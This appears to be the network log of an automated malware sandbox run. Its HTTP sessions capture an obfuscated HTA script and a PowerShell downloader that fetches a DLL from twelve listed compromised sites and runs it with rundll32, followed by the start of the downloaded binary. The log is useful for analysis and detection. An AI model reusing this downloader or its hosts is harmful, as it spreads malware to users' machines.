Jan 28, 2022 21:37:49.242827892 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242868900 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242897987 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.242911100 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242949963 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242980957 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.242990971 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.243030071 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.243058920 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.243072033 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.243113995 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.243140936 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.243150949 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.243202925 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.243231058 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.243242979 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.243282080 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.243311882 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.418298006 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.418360949 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.418426991 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.418493032 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.422379017 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.422420979 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.422461987 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.422467947 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.422496080 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.422498941 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.422524929 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.422552109 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.601483107 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.601558924 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:54.065573931 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:54.065757990 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:38:31.025103092 CET	80	49168	91.240.118.172	192.168.2.22
Jan 28, 2022 21:38:31.025250912 CET	49168	80	192.168.2.22	91.240.118.172
Jan 28, 2022 21:39:06.025644064 CET	49168	80	192.168.2.22	91.240.118.172
Jan 28, 2022 21:39:06.086894989 CET	80	49168	91.240.118.172	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 28, 2022 21:37:26.068272114 CET	52167	53	192.168.2.22	8.8.8.8
Jan 28, 2022 21:37:26.087105036 CET	53	52167	8.8.8.8	192.168.2.22
Jan 28, 2022 21:37:47.223004103 CET	50591	53	192.168.2.22	8.8.8.8
Jan 28, 2022 21:37:47.241802931 CET	53	50591	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 28, 2022 21:37:26.068272114 CET	192.168.2.22	8.8.8.8	0x893c	Standard query (0)	hostfeeling.com	A (IP address)	IN (0x0001)
Jan 28, 2022 21:37:47.223004103 CET	192.168.2.22	8.8.8.8	0xef27	Standard query (0)	jurnalpjf.lan.go.id	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 28, 2022 21:37:26.087105036 CET	8.8.8.8	192.168.2.22	0x893c	No error (0)	hostfeeling.com		164.90.147.135	A (IP address)	IN (0x0001)
Jan 28, 2022 21:37:47.241802931 CET	8.8.8.8	192.168.2.22	0xef27	No error (0)	jurnalpjf.lan.go.id		103.206.244.105	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

91.240.118.172

jurnalpjf.lan.go.id

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	91.240.118.172	80	C:\Windows\System32\mshta.exe

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 21:37:21.552747011 CET	0	OUT	GET /gg/ff/fe.html HTTP/1.1 Accept: / Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 91.240.118.172 Connection: Keep-Alive
Jan 28, 2022 21:37:21.615829945 CET	2	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Fri, 28 Jan 2022 20:37:21 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 62 32 65 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 73 63 72 69 70 74 3e 6c 31 6c 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 3b 76 61 72 20 66 39 66 37 36 63 3d 74 72 75 65 3b 6c 6c 31 3d 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 3b 6c 6c 6c 3d 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 3b 66 39 66 37 36 63 3d 28 21 28 6c 31 6c 26 26 6c 6c 31 29 26 26 21 28 21 6c 31 6c 26 26 21 6c 6c 31 26 26 21 6c 6c 6c 29 29 3b 6c 5f 6c 6c 3d 6c 6f 63 61 74 69 6f 6e 2b 27 27 3b 6c 31 31 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 49 31 28 6c 31 49 29 7b 72 65 74 75 72 6e 20 6c 31 31 2e 69 6e 64 65 78 4f 66 28 6c 31 49 29 3e 30 3f 74 72 75 65 3a 66 61 6c 73 65 7d 3b 6c 49 49 3d 6c 49 31 28 27 6b 68 74 27 29 7c 6c 49 31 28 27 70 65 72 27 29 3b 66 39 66 37 36 63 7c 3d 6c 49 49 3b 7a 4c 50 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 27 30 46 44 27 3b 6d 59 32 4b 63 49 38 48 57 51 50 41 38 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 71 35 32 4c 69 36 36 38 4d 36 38 70 52 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 71 35 32 4c 69 36 36 38 4d 36 38 70 52 5b 30 5d 3d 27 25 36 44 5c 31 37 30 25 33 38 25 33 38 25 33 33 25 33 34 25 33 34 25 34 31 27 20 20 20 3b 6d 59 32 4b 63 49 38 48 57 51 50 41 38 5b 30 5d 3d 27 7f 3c 7f 21 7f 44 7f 4f 7f 43 7f 54 7f 59 7f 50 7f 45 7f 20 7f 68 7f 74 7f 6d 7f 6c 7f 20 7f 50 7f 55 7f 42 7f 4c 7f 49 7f 43 7f 20 7f 22 7f 2d 7f 2f 7f 2f 7f 57 7f 33 7f 43 7e 18 7f 44 7f 54 7f 44 7f 20 7f 58 7f 48 7f 54 7f 4d 7f 4c 7f 20 7f 31 7f 2e 7f 30 7f 20 7f 54 7f 72 7f 61 7f 6e 7f 73 7f 69 7f 74 7f 69 7f 6f 7f 6e 7f 61 7f 6c 7e 18 7f 45 7f 4e 7f 22 7e 15 7e 5c 6e 7f 74 7f 70 7f 3a 7e 18 7f 77 7e 42 7f 2e 7f 77 7f 33 7f 2e 7f 6f 7f 72 7f 67 7f 2f 7f 54 7f 52 7f 2f 7f 78 7e 5c 6e 7e 0c 7f 31 7f 2f 7e 1e 7f 44 7e 4e 7e 50 7f 6c 7f 31 7f 2d 7f 74 7e 2d 7e 2f 7e 31 7e 33 7e 35 7f 6c 7f 2e 7f 64 7f 74 7f 64 7f 22 7f 3e 7f 3c 7e 57 7f 20 7f 78 7e 0c 7e 2f 7f 3d 7f 22 7e 3d 7e 3f 7e 41 7e 43 7e 45 7e 47 7e 49 7f 2f 7f 31 7f 39 7e 79 7e 56 7e 0b 7f 6c 7e 66 7e 68 7f 65 7f 61 7f 64 7e 67 7f 73 7f 63 7f 72 7f 69 7f 70 7f 74 7f 3e 7f 65 7f 76 7e 36 7f 28 7f 75 7f 6e 7f 65 7d 04 7f 61 7f 70 7f 65 7f 28 7f 5c 27 7d 0c 7f 5c 5c 7f 31 7f 36 7f 32 7f 25 7f 32 7f 30 7d 19 7f 36 7f 31 7f 79 7f 25 7f 33 7f 37 7d 24 7f 44 7d 1d 7d 26 7f 32 7d 26 7f 33 7f 42 7d 20 7f 31 7d 19 7f 37 7f 31 7d 24 7f 38 7d 5c 27 7d 19 7f 32 7f 33 7f 25 7f 37 7f 34 7d 06 7d 19 7f 35 7f 36 7f 25 7f 36 7d 2a 7f 45 7f 66 7d 20 7f 32 7d 3e 7f 37 7f 6d 7f 43 7f 68 7d 41 7f 31 7f 72 7f 25 7f 34 7f 33 7d 48 7d 19 7f 34 7f 34 7f 65 7d 1d 7d 35 7f 33 7d 33 7f 33 7d 39 7f 32 7f 43 7d 24 7d 5b 7f 30 7d 1d 7f 39 7d 24 7f 42 7d 45 7f 31 7f 35 7f 37 7d 4f 7f 32 7d 35 7f 36 7d 64 7f 33 7d 28 7f 33 7d 62 7d 2d 7f 69 7d 24 7d 5f 7f Data Ascii: 2b2e<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode\|\|document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')\|lI1('per');f9f76c\|=lII;zLP=location.protocol+'0FD';mY2KcI8HWQPA8=new Array();q52Li668M68pR=new Array();q52Li668M68pR[0]='%6D\170%38%38%33%34%34%41' ;mY2KcI8HWQPA8[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'}\\162%20}61y%37}$D}}&2}&3B} 1}71}$8}\'}23%74}}56%6}*Ef} 2}>7mCh}A1r%43}H}44e}}53}33}92C}$}[0}9}$B}E157}O2}56}d3}(3}b}-i}$}_
Jan 28, 2022 21:37:21.615876913 CET	3	IN	Data Raw: 33 7d 1c 7d 5a 7d 24 7d 2c 7d 6f 7f 42 7d 41 7d 64 7f 32 7d 7e 7c 01 7d 63 7d 3a 7d 2e 7d 1a 7d 30 7f 31 7d 32 7d 7b 7d 1d 7d 7e 7d 70 7f 71 7d 31 7d 5b 7d 35 7f 37 7d 71 7d 7e 7f 36 7d 40 7f 37 7f 35 7d 3e 7f 36 7f 63 7d 3a 7f 34 7f 69 7d 48 7d Data Ascii: 3}}Z}$},}oB}A}d2}~\|}c}:}.}}01}2}{}}~}pq}1}[}57}q}~6}@75}>6c}:4i}H}AE}}\|}:}o}@}l\|7Bif}X}1d}Hcument}E}T4o\|\|\|6\|8M}S1}U}T5}\|(\|(\|1\| 6}9\|@\|7\|92Ea}>4\|V\|*\|}Uo}T\|O5\|6\|!\|REwr}>1t\|G\|/}2\|\|2}d\|}:
Jan 28, 2022 21:37:21.615892887 CET	4	IN	Data Raw: 2d 78 7b 7e 48 78 7e 78 30 7f 36 78 32 7f 3e 7f 54 7f 68 78 47 7f 73 77 5c 6e 7f 72 79 5a 7f 20 78 2a 78 1f 7f 20 7f 6f 7f 66 7f 20 7f 74 7f 68 7f 69 7f 73 7f 20 7b 57 7a 73 7f 20 77 25 77 5c 27 77 09 78 09 7f 63 78 09 78 5c 27 7f 62 7f 79 7f 20 Data Ascii: -x{~Hx~x06x2>ThxGsw\nryZ x*x of this {Wzs w%w\'wxcxx\'by <b~gxJxCxExxwx} xFCCw~#~% Guardx]nyzxJ~g/w6w4brww ul~2maxw"ox+w`w,ow.t yw wE~&wexZiw]zssxZJa} }p{&twt wv}y\|xw~
Jan 28, 2022 21:37:21.615930080 CET	6	IN	Data Raw: 32 4b 63 49 38 48 57 51 50 41 38 5b 30 5d 2b 3d 27 32 7e 34 78 53 7f 6e 7e 34 7f 65 78 7a 78 2b 77 0f 77 3f 77 7a 62 77 42 78 32 7e 09 7f 72 7a 17 78 16 7e 70 7e 40 7f 2f 7e 42 7f 77 7f 2e 7f 70 77 2d 76 1a 76 47 7f 2e 78 2a 7f 6d 78 1b 78 5c 72 Data Ascii: 2KcI8HWQPA8[0]+='2~4xSn~4exzx+ww?wzbwBx2~rzx~p~@/~Bw.pw-vvG.x*mxx\r~Ixdx_x~.kx#wTw7vv0w;xIvxLxNxPxRxTxVxXxZx\\x^wkxaxcxexgsxixkxmfxoxq~0xtxvxxv?x\|x~vCwC0wwwwww\rv@w>x/0x1x">vM.Pw-WwJv&vUwOvwQw6yzawQ~du#v-/x
Jan 28, 2022 21:37:21.616046906 CET	7	IN	Data Raw: 28 71 38 7e 58 73 4b 78 66 78 6c 7e 5c 27 7f 3a 73 14 72 44 71 13 7b 69 71 15 7f 28 7f 37 7f 39 7f 2c 71 50 71 52 71 51 7b 21 71 52 73 36 71 56 71 59 71 58 71 5b 71 57 75 2d 77 55 7d 7a 62 7f 6b 7f 3b 71 46 78 47 7f 32 71 49 72 66 74 05 7f 65 72 Data Ascii: (q8~XsKxfxl~\':srDq{iq(79,qPqRqQ{!qRs6qVqYqXq[qWu-wU}zbk;qFxG2qIrfterrqMru38,47qoqq}hqo1s75,qQqQ{qwqwq^vGaqaqc 3qfqKqiqru0,qmpqnqtqQpqy,q\|qt}hqq`qbtxG4pu0qLrtqp\rqpqrq}z-q}qzp2q}p;q_pu.zawZtpqhqjp!
Jan 28, 2022 21:37:21.616064072 CET	9	IN	Data Raw: 25 32 39 25 32 43 25 36 43 25 33 30 25 33 44 6e 25 36 35 5c 31 36 37 25 32 30 5c 31 30 31 25 37 32 72 5c 31 34 31 25 37 39 25 32 38 25 32 39 25 32 43 49 25 36 43 25 33 44 25 33 31 25 33 32 25 33 38 25 33 42 64 5c 31 35 37 25 37 42 6c 25 33 30 25 Data Ascii: %29%2C%6C%30%3Dn%65\167%20\101%72r\141%79%28%29%2CI%6C%3D%31%32%38%3Bd\157%7Bl%30%5B%49l%5D%3D%53tr%69\156g%2EfromCh\141%72Co\144%65%28Il%29%7D\167%68%69%6Ce%28%2D%2DI%6C%29%3BIl%3D%31%32%38%3Bl%31%5B%30%5D%3D%6Ci%3Dl%30%5Bl%37%5B%30%5D%5D%3B%
Jan 28, 2022 21:37:21.616080046 CET	10	IN	Data Raw: 34 7f 53 7f 69 78 0f 73 2a 70 43 6f 58 6d 18 7f 28 7f 78 7f 75 7f 75 6e 62 6d 62 6d 21 72 31 6f 29 73 4b 7f 72 7f 3d 6f 40 77 23 6e 52 7e 2e 78 03 74 4c 75 2d 7f 64 70 37 7f 20 7f 44 6e 6d 6c 10 75 67 6f 69 6f 1a 74 1b 74 24 6f 2a 6c 34 73 4b 7f Data Ascii: 4SixspCoXm(xuunbmbm!r1o)sKr=o@w#nR~.xtLu-dp7 Dnmlugoiott$ol4sKo=s(}y(s,s.}Ks1s3(lroBfx,pzr25+{?n]lxG{kks,ks>kdospB+\'tDosOou;k/k1=ol1klOkk2k.k4tVtOtQx7k5lp{y}w xtXvN}dExc\|8Lw%vztw\'wz
Jan 28, 2022 21:37:21.616096973 CET	11	IN	Data Raw: 7f 2e 7e 3e 7f 69 75 2c 67 4d 67 59 7f 28 7f 38 67 63 67 5f 67 73 78 18 7f 34 67 5d 67 2e 7f 22 78 61 7e 7d 69 41 6f 67 77 79 7f 61 74 18 7f 73 77 26 78 39 7f 43 6c 0b 7f 65 68 52 7f 6a 68 56 6f 6d 67 56 7f 29 69 41 7f 63 66 12 7f 76 67 58 67 61 Data Ascii: .~>iu,gMgY(8gcg_gsx4g]g."xa~}iAogwyatsw&x9ClehRjhVomgV)iAcfvgXga(gssEg]gwffg^g`s>5pBffff9f#ff\'ff)yx+gsf,f+f&f(f}iyxf1s>xs~f.frgzf7s}pf?gysgx0s~fB08fDf<fIf3s>}xf\nffs.R}wfgMgDbgFnxZffJi_gNx,x
Jan 28, 2022 21:37:21.616110086 CET	12	IN	Data Raw: 20 20 28 62 31 37 64 37 51 4c 42 68 38 67 68 29 3b 62 33 52 5a 34 44 32 78 42 50 77 20 20 20 28 62 31 37 64 37 51 4c 42 68 38 67 68 29 3b 68 57 50 44 66 35 6c 74 53 37 4d 59 37 32 59 32 34 34 20 20 20 20 28 78 32 63 56 58 6c 33 39 29 3b 67 38 35 Data Ascii: (b17d7QLBh8gh);b3RZ4D2xBPw (b17d7QLBh8gh);hWPDf5ltS7MY72Y244 (x2cVXl39);g85tUx8O57Sri34='vE7JOE4YL7z2BEimBE630IL966M' ;eval(unescape('%71%79%36%28%22%63%37%39%38%66%62%36%39%66%22%29%3B'));cG3XHY59bDjh8i5+='syQqJrqlvQcnJERouTsFYMXOqfK
Jan 28, 2022 21:37:21.616122007 CET	12	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	91.240.118.172	80	C:\Windows\System32\mshta.exe

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 21:37:25.962825060 CET	12	OUT	GET /gg/ff/fe.png HTTP/1.1 Host: 91.240.118.172 Connection: Keep-Alive
Jan 28, 2022 21:37:26.024713993 CET	14	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Fri, 28 Jan 2022 20:37:25 GMT Content-Type: image/png Content-Length: 1199 Connection: keep-alive Last-Modified: Fri, 28 Jan 2022 14:54:48 GMT ETag: "4af-5d6a59dbe5e00" Accept-Ranges: bytes Data Raw: 24 70 61 74 68 20 3d 20 22 43 7b 73 65 65 64 61 7d 3a 5c 50 72 7b 73 65 65 64 61 7d 6f 67 72 61 6d 44 7b 73 65 65 64 61 7d 61 74 61 5c 7b 73 65 65 64 61 7d 4a 6f 6f 53 65 65 2e 64 7b 73 65 65 64 61 7d 6c 6c 22 2e 72 65 70 6c 61 63 65 28 27 7b 73 65 65 64 61 7d 27 2c 27 27 29 3b 0d 0a 24 75 72 6c 31 20 3d 20 27 68 74 74 70 3a 2f 2f 68 6f 73 74 66 65 65 6c 69 6e 67 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 34 58 73 6a 74 4f 54 37 63 46 48 76 42 56 33 48 5a 2f 27 3b 0d 0a 24 75 72 6c 32 20 3d 20 27 68 74 74 70 3a 2f 2f 6a 75 72 6e 61 6c 70 6a 66 2e 6c 61 6e 2e 67 6f 2e 69 64 2f 61 73 73 65 74 73 2f 69 4d 2f 27 3b 0d 0a 24 75 72 6c 33 20 3d 20 27 68 74 74 70 3a 2f 2f 69 74 2d 6f 2e 62 69 7a 2f 62 69 74 72 69 78 2f 78 6f 44 64 44 65 2f 27 3b 0d 0a 24 75 72 6c 34 20 3d 20 27 68 74 74 70 3a 2f 2f 62 69 6d 65 73 61 72 61 79 65 6e 6f 76 69 6e 2e 69 72 2f 77 70 2d 61 64 6d 69 6e 2f 47 31 70 59 47 4c 2f 27 3b 0d 0a 24 75 72 6c 35 20 3d 20 27 68 74 74 70 3a 2f 2f 67 61 72 64 65 6e 69 6e 67 66 69 6c 6d 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 63 4d 56 55 59 44 51 33 71 2f 27 3b 0d 0a 24 75 72 6c 36 20 3d 20 27 68 74 74 70 3a 2f 2f 64 61 69 73 79 2e 73 75 6b 6f 62 75 72 75 2d 73 65 63 75 72 65 2e 63 6f 6d 2f 38 70 6c 6b 73 2f 76 38 6c 79 5a 54 65 2f 27 3b 0d 0a 24 75 72 6c 37 20 3d 20 27 68 74 74 70 73 3a 2f 2f 70 72 6f 70 65 72 74 79 2d 65 67 2e 63 6f 6d 2f 6d 6c 7a 6b 69 72 2f 39 37 76 2f 27 3b 0d 0a 24 75 72 6c 38 20 3d 20 27 68 74 74 70 3a 2f 2f 74 6f 74 61 6c 70 6c 61 79 74 75 78 74 6c 61 2e 63 6f 6d 2f 73 69 74 69 6f 2f 44 67 6b 74 4c 33 7a 64 2f 27 3b 0d 0a 24 75 72 6c 39 20 3d 20 27 68 74 74 70 3a 2f 2f 6d 61 78 74 64 65 76 65 6c 6f 70 65 72 2e 63 6f 6d 2f 6f 6b 77 39 79 78 2f 47 63 32 38 5a 58 2f 27 3b 0d 0a 24 75 72 6c 31 30 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 61 62 6c 72 2e 63 6f 6d 2f 65 6c 65 6e 63 74 69 63 2f 66 4d 46 74 52 72 62 73 45 58 31 67 58 75 33 5a 31 4d 2f 27 3b 0d 0a 24 75 72 6c 31 31 20 3d 20 27 68 74 74 70 3a 2f 2f 61 63 74 69 76 65 74 72 61 69 6e 69 6e 67 2e 73 79 74 65 73 2e 6e 65 74 2f 6c 69 62 72 61 72 69 65 73 2f 38 73 2f 27 3b 0d 0a 24 75 72 6c 31 32 20 3d 20 27 68 74 74 70 73 3a 2f 2f 67 75 64 61 6e 67 74 61 73 6f 72 69 63 68 69 6e 61 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 47 47 30 31 63 2f 27 3b 0d 0a 0d 0a 24 77 65 62 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 6e 65 74 2e 77 65 62 63 6c 69 65 6e 74 3b 0d 0a 24 75 72 6c 73 20 3d 20 22 24 75 72 6c 31 2c 24 75 72 6c 32 2c 24 75 72 6c 33 2c 24 75 72 6c 34 2c 24 75 72 6c 35 2c 24 75 72 6c 36 2c 24 75 72 6c 37 2c 24 75 72 6c 38 2c 24 75 72 6c 39 2c 24 75 72 6c 31 30 2c 24 75 72 6c 31 31 2c 24 75 72 6c 31 32 22 2e 73 70 6c 69 74 28 22 2c 22 29 3b 0d 0a 66 6f 72 65 61 63 68 20 28 24 75 72 6c 20 69 6e 20 24 75 72 6c 73 29 20 7b 0d 0a 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 24 77 65 62 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 24 75 72 6c 2c 20 24 70 61 74 68 29 3b 0d 0a 20 20 20 20 20 20 20 69 66 20 28 28 47 65 74 2d 49 74 65 6d 20 24 70 61 74 68 29 2e 4c 65 6e 67 74 68 20 2d 67 65 20 33 30 30 30 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 5b 44 69 61 67 6e 6f 73 74 69 63 73 2e 50 72 6f 63 65 73 73 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0d 0a 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 7d 0d Data Ascii: $path = "C{seeda}:\Pr{seeda}ogramD{seeda}ata\{seeda}JooSee.d{seeda}ll".replace('{seeda}','');$url1 = 'http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/';$url2 = 'http://jurnalpjf.lan.go.id/assets/iM/';$url3 = 'http://it-o.biz/bitrix/xoDdDe/';$url4 = 'http://bimesarayenovin.ir/wp-admin/G1pYGL/';$url5 = 'http://gardeningfilm.com/wp-content/pcMVUYDQ3q/';$url6 = 'http://daisy.sukoburu-secure.com/8plks/v8lyZTe/';$url7 = 'https://property-eg.com/mlzkir/97v/';$url8 = 'http://totalplaytuxtla.com/sitio/DgktL3zd/';$url9 = 'http://maxtdeveloper.com/okw9yx/Gc28ZX/';$url10 = 'http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/';$url11 = 'http://activetraining.sytes.net/libraries/8s/';$url12 = 'https://gudangtasorichina.com/wp-content/GG01c/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12".split(",");foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } }
Jan 28, 2022 21:37:26.024735928 CET	14	IN	Data Raw: 0a 20 20 20 63 61 74 63 68 7b 7d 0d 0a 7d 20 0d 0a 53 6c 65 65 70 20 2d 73 20 34 3b 63 6d 64 20 2f 63 20 43 3a 5c 57 69 6e 64 6f 77 73 5c 53 79 73 57 6f 77 36 34 5c 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 27 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 Data Ascii: catch{}} Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\ProgramData\JooSee.dll',ssAAqq;

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49170	103.206.244.105	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 21:37:47.422261000 CET	15	OUT	GET /assets/iM/ HTTP/1.1 Host: jurnalpjf.lan.go.id Connection: Keep-Alive
Jan 28, 2022 21:37:47.614145994 CET	16	IN	HTTP/1.1 200 OK Date: Fri, 28 Jan 2022 20:37:47 GMT Server: Apache/2.4.6 (CentOS) PHP/7.4.27 X-Powered-By: PHP/7.4.27 Set-Cookie: 61f4541b7e0f9=1643402267; expires=Fri, 28-Jan-2022 20:38:47 GMT; Max-Age=60; path=/ Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Fri, 28 Jan 2022 20:37:47 GMT Expires: Fri, 28 Jan 2022 20:37:47 GMT Content-Disposition: attachment; filename="sAJSMp.dll" Content-Transfer-Encoding: binary Content-Length: 548864 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 